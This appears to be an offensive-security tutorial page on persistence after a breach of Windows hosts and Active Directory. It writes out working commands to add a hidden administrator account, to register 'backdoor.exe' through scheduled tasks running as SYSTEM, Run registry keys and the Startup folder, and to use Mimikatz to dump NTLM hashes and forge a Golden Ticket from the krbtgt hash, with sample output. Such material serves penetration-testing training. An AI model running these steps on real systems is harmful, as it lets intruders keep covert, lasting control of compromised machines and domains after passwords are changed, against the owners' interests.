Persistence

Local Computer

With administrative privileges on a computer, you can do anything. If we want to keep control of this computer, even after someone's password changes, for example, we can create some "backdoors".

One simple way is to create a new local account on the computer and give it the BUILTIN\Administrators group:

net user $USERNAME $PASSWORD /add
net localgroup Administrators $USERNAME /add

This later allows you to log in as that user and dump cached creds like Post-Exploitation: Mimikatz

Another method is creating a scheduled task that executes hourly or in another period and runs a program that gives you a reverse shell, for example.

# Run every 1 hour
schtasks /create /sc HOURLY /mo 1 /tn "Cleanup" /tr "C:\Windows\Tasks\backdoor.exe"
# Run on startup, as the SYSTEM user
schtasks /create /sc ONSTART /tn "Cleanup" /ru "SYSTEM" /tr "C:\Windows\Tasks\backdoor.exe"

Then another classic is Autoruns, programs that register themselves to start on startup. You can place binaries or scripts in the following shell:startup directory, and they will execute on startup:

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup

The Windows Registry can also be a great sea of abusable keys that automatically run programs. The Software\Microsoft\Windows\CurrentVersion\Run path for HKCU and HKLM contains a key for every program that should start at startup, for only the current user or all users:

# Run for the current user
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Cleanup" /t REG_SZ /d "C:\Windows\Tasks\backdoor.exe" /f
# Run for all users
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Cleanup" /t REG_SZ /d "C:\Windows\Tasks\backdoor.exe" /f

Active Directory

When an entire active directory is compromised, a lot of integrity is lost. Any secrets can be read out, and later used to log in as any user after your access has been revoked. Here are some well-known attacks that real threat actors use to persist after a breach if all the required secrets are not rotated.

Golden Ticket

We've seen Forge (Silver) Tickets where we have the hash of an SPN and can forge a Kerberos ticket as any user for that service. Taking this one step further is possible when we compromise the NTLM hash of the krbtgt user. Because TGTs are encrypted with this secret, we can forge any ticket in the future if we know it.

On the Domain Controller, we will ask the LSA server for all known credentials using Mimikatz:

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::lsa /patch
Domain : $DOMAIN / S-1-5-21-5386719015-7638691639-2457330780

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 8a772f3282654f2f9e165e19926a32a4

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 752da57f6d5047d6a251359025bd97e1
...

This finds the NTLM hash for the krbtgt user which can now be used to forge any ticket. When the time comes after vulnerabilities have been patched, the attacker can still get a new valid session.

We provide the domain and its SID (found using whoami /user), then choose a user with a lot of privileges like a Domain Admin, and give the krbtgt NTLM hash:

mimikatz # kerberos::purge
Ticket(s) purge for current session is OK

mimikatz # kerberos::golden /ptt /domain:corp.com /sid:S-1-5-21-1987370270-658905905-1781884369 /user:jen /krbtgt:752da57f6d5047d6a251359025bd97e1
User      : jen
Domain    : corp.com (CORP)
SID       : S-1-5-21-1987370270-658905905-1781884369
User Id   : 500    
Groups Id : *513 512 520 518 519
ServiceKey: 1693c6cefafffc7af11ef34d1c788f47 - rc4_hmac_nt
Lifetime  : 9/16/2022 2:15:57 AM ; 9/13/2032 2:15:57 AM ; 9/13/2032 2:15:57 AM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'jen @ corp.com' successfully submitted for current session

mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF665F1B800

This injects it into our current session, and the newly spawned cmd.exe will allow you to do anything on the domain through Kerberos, like Lateral Movement with a hostname instead of an IP to get a shell.